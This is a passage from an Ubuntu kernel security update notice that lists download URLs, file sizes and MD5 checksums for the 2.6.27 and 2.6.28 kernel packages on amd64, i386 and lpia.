  Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13614 c860448fa643364e8776a4947cff9714

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86942 49099dad48131ce191b10c154f096d6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb
  Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb
  Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz
  Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc
  Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb
  Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb
  Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb
  Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb
  Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb
  Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   215170 7939440a8813110d952d86b49113e146
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     8874 f173072403f51e6e6da399debd91068f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    13472 1399e0100a81d92448659b83949a62a6

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   525752 1a2c59458472f4a18538df9386396703
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb
  Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb
  Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   262814 794c683379e359de14db8806fe984f78
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb
  Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   149398 b14f79b842c979418dec65e273836cd0
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   184736 a159624d12831598d35c3b00ba563182
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    34462 582363a3843fdbded2476793775ace76
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
